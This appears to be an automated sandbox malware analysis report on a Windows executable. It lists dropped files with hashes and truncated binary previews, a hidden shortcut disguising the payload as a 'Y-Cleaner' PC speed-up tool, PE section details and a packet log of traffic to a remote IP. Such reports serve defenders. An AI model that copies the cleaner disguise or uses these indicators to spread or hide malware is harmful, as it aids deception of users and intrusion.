                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1250000
                                        Entropy (8bit):7.914044333202875
                                        Encrypted:false
                                        SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60:7rPD/8I/8ly+Zrr2h60
                                        MD5:06BCE98464ED237227246A609B8A2A80
                                        SHA1:4A4945FCFCB498D7B8AC9B2CD0EDEB26DFD810E5
                                        SHA-256:50FADCBC24764ECC8BEA076BDD6FD8E3BA32865BCCE3BABD02DF65A7837656D1
                                        SHA-512:34790FFAD56407C220A75A6E54D96A7410745E12507E20729CFB0311B8349501FD57BC0E50ACFA5D884BED0F1CD0A3C096E59F10D93FD4465E0659A17EA8D534
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Dec 12 21:09:06 2024, mtime=Thu Dec 12 21:09:06 2024, atime=Thu Dec 12 21:09:06 2024, length=1250000, window=hide
                                        Category:dropped
                                        Size (bytes):2205
                                        Entropy (8bit):3.8835738484806357
                                        Encrypted:false
                                        SSDEEP:24:8a8i2QzgoN3g7ORN+lgKUggsgJ7yALfCefvNm+P9+NO4ZCeLq+Urkh7qyFm:8a88goN30ORYKdRbjvNmU9GZfqbkoyF
                                        MD5:A81BCF1C6016A3E65C70FA19C864681C
                                        SHA1:496A69C085055727800A5ED52767D2EB0FE132C8
                                        SHA-256:DDE70E64644897720FB3C163CEEE855A2B6E4FBDDD4280BE7C2E0895B6EC986A
                                        SHA-512:85F5D5B427E9BC3F6F673C52C3373F09303502420422FC3FC5EF5B3A40465C535DA806BD985725FA95AEAC461CC2D79A388AA3FD8560BB62C7542AB4B58F2C36
                                        Malicious:false
                                        Preview:L..................F.@.. ....^<v.L...^<v.L...^<v.L..........................>.:..DG..Yr?.D..U..k0.&...&......vk.v.....}.K.L....Cv.L......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................&h.L.o.c.a.l.....N.1......Y....Temp..:......CW.^.Y......l......................c%.T.e.m.p.....z.1......Y!...SVTJDF~1..b......Y!..Y!.....h........................s.v.t.J.D.f.v.f.3.6.4.R.4.G.4.5.e.f.f.w.5.3.J.7.....h.2......Y$. .Y-CLEA~1.EXE..L......Y$..Y$...........................b...Y.-.C.l.e.a.n.e.r...e.x.e.......w...............-.......v.............f].....C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.<.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.v.t.J.D.f.v.f.3.6.4.R.4.G.4.5.e.f.f.w.5.3.J.7.\.Y.-.C.l.e.a.n.e.r...e.x.e.H.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.465260413782726
                                        Encrypted:false
                                        SSDEEP:6144:iIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbE:HXD94+WlLZMM6YFH1+E
                                        MD5:79782A6C8ED8163D39D4D3F0031C4853
                                        SHA1:BFF643C4848F212B3D5AEF97BC5EA3B929E07065
                                        SHA-256:56C50FBBEA972F96EA64973F1722FF9D9000D049EF33E6AF2A15D282426BC3E3
                                        SHA-512:DBB5F62F08CBE9FA75FBFBEF7B26117E930B26FC678272909D2111D9614B13C0333D99336846980F410D4188CE57C179BB15029A9249FF3BF29033ECCA6E8680
                                        Malicious:false
                                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...v.L...............................................................................................................................................................................................................................................................................................................................................C.B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.935646747304673
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:1'948'672 bytes
                                        MD5:dd44780d69d56d86bd3be9d6ca0f69a9
                                        SHA1:c9afab3e117153f469723102214a907685a509d6
                                        SHA256:5cf283b12d73892ee010289b4d554e5b1c7d1aede0a8e6cd0a33415513526b5b
                                        SHA512:2941a447f343d039f356cd63a009b33f5eb042553143c009a23a4e68e76c59101052fc9a8092f56b81bf61b3c068b3c685c558933a672ec03c0e94fb4b873eff
                                        SSDEEP:49152:SIdVlhK5Cvfpj1KOtgQ+HVihZbWblzBdB:SILvvRjwOtnbZ0lnB
                                        TLSH:EE9533DBCC6EE19CD8369E366867CEFBCBC02E15AD6057736441ED1E6C2E6904793220
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d...................
                                        Icon Hash:c7a99a8aa651798c
                                        Entrypoint:0xc62000
                                        Entrypoint Section:.taggant
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x64DDDE0C [Thu Aug 17 08:45:00 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:0
                                        File Version Major:5
                                        File Version Minor:0
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:0
                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                        Instruction
                                        jmp 00007F1A78F0691Ah
                                        setp byte ptr [00000000h]
                                        add cl, ch
                                        add byte ptr [eax], ah
                                        add byte ptr [eax], al
                                        add byte ptr [0000000Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dh
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        and al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        push es
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add al, 0Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        Programming Language:
                                        • [C++] VS2008 build 21022
                                        • [ASM] VS2008 build 21022
                                        • [ C ] VS2008 build 21022
                                        • [IMP] VS2005 build 50727
                                        • [RES] VS2008 build 21022
                                        • [LNK] VS2008 build 21022
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x42105a0x6e.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40e0000x12168.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x855aac0x18piktqyia
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        0x10000x40d0000x2540022fe1a09310da884bd4897e978868d79unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x40e0000x121680x940096428c6a551fb8ea148ea4d211fb869bFalse0.9627586570945946data7.892557334800407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata 0x4210000x10000x200de906030ab088402d586a76aa6666758False0.15234375data1.0884795995201089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x4220000x2950000x200cbd7cc82f94a991aeed90360201da57funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        piktqyia0x6b70000x1aa0000x1a9a00a9207a13dde1fc4c2c62e431e83da12dFalse0.9847644777900146OpenPGP Secret Key7.942411405734934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        mvvqpdmt0x8610000x10000x400178b3be9f6273cfa1d30633a3cfcde52False0.7861328125data6.0792700714237355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .taggant0x8620000x30000x22005b05c3fc40a1abaaae0d6d8edfd03f7fFalse0.05905330882352941DOS executable (COM)0.7194871820017328IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_CURSOR0x40e7300x130data1.0361842105263157
                                        RT_CURSOR0x40e8600x25a8data1.0011410788381743
                                        RT_CURSOR0x410e080xea8data1.0029317697228144
                                        RT_ICON0x855b0c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SyriacSyriac0.3648720682302772
                                        RT_ICON0x8569b40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SyriacSyriac0.5063176895306859
                                        RT_ICON0x85725c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SyriacSyriac0.5881336405529954
                                        RT_ICON0x8579240x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SyriacSyriac0.619942196531792
                                        RT_ICON0x857e8c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SyriacSyriac0.3574108818011257
                                        RT_ICON0x858f340x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SyriacSyriac0.3536885245901639
                                        RT_ICON0x8598bc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SyriacSyriac0.40425531914893614
                                        RT_ICON0x859d240xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSyriacSyriac0.7969083155650319
                                        RT_ICON0x85abcc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSyriacSyriac0.8032490974729242
                                        RT_ICON0x85b4740x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSyriacSyriac0.7350230414746544
                                        RT_ICON0x85bb3c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSyriacSyriac0.7774566473988439
                                        RT_ICON0x85c0a40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SyriacSyriac0.6827800829875519
                                        RT_ICON0x85e64c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SyriacSyriac0.7293621013133208
                                        RT_ICON0x85f6f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SyriacSyriac0.7594262295081967
                                        RT_ICON0x86007c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SyriacSyriac0.8111702127659575
                                        RT_DIALOG0x41c6880x84empty0
                                        RT_STRING0x41c70c0x4beempty0
                                        RT_STRING0x41cbcc0xc4empty0
                                        RT_STRING0x41cc900x732empty0
                                        RT_STRING0x41d3c40x7bcempty0
                                        RT_STRING0x41db800x5f0empty0
                                        RT_STRING0x41e1700x696empty0
                                        RT_STRING0x41e8080x7c0empty0
                                        RT_STRING0x41efc80x76aempty0
                                        RT_STRING0x41f7340x610empty0
                                        RT_GROUP_CURSOR0x41fd440x22empty0
                                        RT_GROUP_CURSOR0x41fd680x14empty0
                                        RT_GROUP_ICON0x8604e40x76dataSyriacSyriac0.6779661016949152
                                        RT_GROUP_ICON0x86055a0x68dataSyriacSyriac0.7115384615384616
                                        RT_VERSION0x8605c20x1b8COM executable for DOS0.5704545454545454
                                        RT_MANIFEST0x86077a0x152ASCII text, with CRLF line terminators0.6479289940828402
                                        DLLImport
                                        kernel32.dlllstrcpy
                                        Language of compilation systemCountry where language is spokenMap
                                        SyriacSyriac
                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 12, 2024 23:08:30.480293989 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:30.600111961 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:30.600215912 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:30.600440025 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:30.720208883 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:32.034440041 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:32.034543037 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:32.048204899 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:32.168771029 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:32.544460058 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:32.544590950 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:32.641680956 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:32.761826038 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198153019 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198194027 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198210955 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198211908 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.198254108 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.198254108 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.198432922 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198457003 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198472977 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198477030 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.198491096 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198503017 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.198540926 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.198540926 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.198749065 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.198795080 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.206496954 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.206554890 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.206646919 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.206691027 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.212742090 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.212791920 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.213195086 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.213254929 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.318023920 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.318089962 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.391094923 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.391218901 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.391222954 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.391283035 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.393265963 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.393323898 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.393445969 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.393493891 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.401271105 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.401351929 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.401423931 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.401472092 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.409079075 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.409164906 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.409220934 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.409269094 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.416898966 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.416994095 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.417049885 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.417104006 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.424364090 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.424381971 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.424453974 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.432787895 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.432805061 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.432878017 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.440548897 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.440650940 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.440720081 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.440782070 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.448482990 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.448573112 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.448642015 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.448780060 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.456218004 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.456310987 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.456384897 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.456432104 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.462610006 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.462630987 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.462845087 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.470221043 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.470292091 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.470520020 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.470571041 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.477404118 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.477483034 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.582114935 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.582214117 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.582278967 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.582318068 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.584492922 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.584554911 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.585366964 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.585377932 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.585417986 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.585445881 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.588258028 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.588320017 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.588392019 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.588438034 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.593255997 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.593317032 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.593322992 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.593363047 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.600580931 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.600594044 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.600651979 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.603899956 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.603960991 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.604115963 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.604182005 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.607990026 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.608042002 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.608273029 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.608319044 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.612502098 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.612560034 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.612679005 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.612725019 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.615741968 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.615752935 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.615803957 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.621529102 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.621541023 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.621602058 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.624839067 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.624851942 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.624897957 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.629055977 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.629067898 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.629126072 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.633407116 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.633467913 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.633574009 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.633618116 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.637989044 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.638000965 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.638053894 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.643580914 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.643593073 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.643639088 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.648315907 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.648328066 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.648374081 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.652662992 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.652718067 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.652776957 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.652823925 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.656934023 CET804973680.82.65.70192.168.2.4
